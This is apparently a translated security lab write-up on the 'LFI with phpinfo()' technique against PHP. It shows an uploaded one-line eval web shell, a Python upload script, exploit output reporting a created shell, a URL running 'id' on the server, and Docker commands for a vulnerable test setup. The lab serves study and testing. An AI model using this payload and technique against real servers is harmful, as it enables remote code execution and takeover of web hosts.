0x00 About
LFI with phpinfo() is a PHP local file inclusion technique. WooYun published a corresponding article on it early on, and the technique was first described abroad by Daniel; the two papers below cover the details. The principle: a PHP POST file upload makes the server create a temporary file, phpinfo() reveals that temporary file's path and name, and a local file inclusion vulnerability then includes the temporary file to produce a one-line backdoor.
This method worked in local testing. To make it easier to learn and to cut the setup cost, I built a Docker environment for testing. I put the built Docker image on a foreign VPS and ran the scripts under the POC folder of the GitHub project Lfi_phpinfo locally against it, and still got a shell, so the approach is feasible and does not demand much of the network.
The source directory can be reproduced with Docker; the POC directory stores the exploit scripts.
Papers
http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
0x01 PHP Upload
When a file is uploaded by POST to any PHP file on the server, PHP creates a temporary file to hold the file's contents, and the path and name of that temporary file can be read directly from the phpinfo() page.
HTTP provides a form-based file upload method. The upload form must have enctype="multipart/form-data" and must use the POST method; see the PHP manual, File upload: POST method.
The PHP engine handles a multipart/form-data request as follows:
- The request arrives
- A temporary file is created and the uploaded file's contents are written to it
- The corresponding PHP script is called for processing, such as checking the name, size, etc.
- The temporary file is deleted
So the PHP engine first saves the file contents to a temporary file and then performs the corresponding processing. The temporary file name is php followed by random characters.
- $_FILES information, including the temporary file path and name
In PHP, the superglobal $_FILES holds information about the uploaded file: the file name, type, temporary file name, error code and size.
0x02 Manual test: phpinfo() reveals the temporary file path
File upload.html
Open upload.html in a browser and upload file.txt.
The POST request as seen in Burp:
```http
POST /lfi_phpinfo/phpinfo.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/lfi_phpinfo/upload.html
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11008921013555437861019615112
Content-Length: 368

-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: text/plain

<?php eval($_REQUEST["cmd"]); ?>
-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="submit"

Submit
-----------------------------11008921013555437861019615112--
```
Loading the page in the browser, phpinfo() returns the following:
```text
_REQUEST["submit"]  Submit
_POST["submit"]     Submit
_FILES["file"]      Array ( [name] => file.txt [type] => text/plain [tmp_name] => /tmp/phpufdchh [error] => 0 [size] => + )
```
Take the tmp_name path from this output.
0x03 Python script to upload a file
```python
import requests

host = '127.0.0.1'
url = 'http://{ip}/lfi_phpinfo/phpinfo.php'.format(ip=host)
file_ = '/var/www/lfi_phpinfo/file.txt'

# Any multipart field name works here: phpinfo() simply reports whatever
# arrives in $_FILES, including the temporary file's path.
with open(file_, 'rb') as fh:
    response = requests.post(url, files={"name": fh})
print(response.text)
```
0x04 Local build environment
Get shell
```text
$ python lfi_phpinfo.py 127.0.0.1
LFI with phpinfo()
==============================
INFO:__main__:getting initial offset ...
INFO:__main__:found [tmp_name] at 67801
INFO:__main__:got it! Shell created in /tmp/g
INFO:__main__:wowo! \m/
INFO:__main__:shutting down ...
```
Firefox access
```text
http://127.0.0.1/lfi_phpinfo/lfi.php?load=/tmp/g&f=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
This shows that getshell succeeded; from here you can play freely ~ ~
0x05 Using Docker to build the environment
Basic Docker usage is not covered here; you can look it up yourself. There are two sources for the image: build it yourself from the Dockerfile in the GitHub lfi_phpinfo project, or use the image I have built, janes/lfi_phpinfo.
- The official PHP image php:5.6-apache
or
- janes/lfi_phpinfo
- Build the environment and run the tests
Get the GitHub lfi_phpinfo source, switch to the Web directory, and build the test environment. Three ways of running it are provided.
Mode 1: run the test using the official PHP image
```bash
# Bind mounts need an absolute host path, hence $(pwd).
docker run --rm -v "$(pwd)/code":/var/www/html -p 80:80 php:5.6-apache
```
Mode 2: run the test using the pre-built image janes/lfi_phpinfo
```bash
docker pull janes/lfi_phpinfo
docker run --rm -p 80:80 janes/lfi_phpinfo
```
Mode 3: use docker-compose
```bash
docker-compose up
```
You can then use the Python script to getshell:
```bash
python lfi_phpinfo.py <docker_host_ip>
```
0x06 Concluding remarks
Working through LFI with phpinfo() by hand was in fact not as smooth as the articles make it sound; along the way I ran into a number of environment-related problems, and solving them took real effort. That is where the idea of building the test environment with Docker came from, and I hope it gives security enthusiasts a more convenient environment to learn in. Finally, thanks to the author of the article [LFI with phpinfo Local test process], which helped me a great deal in studying LFI with phpinfo.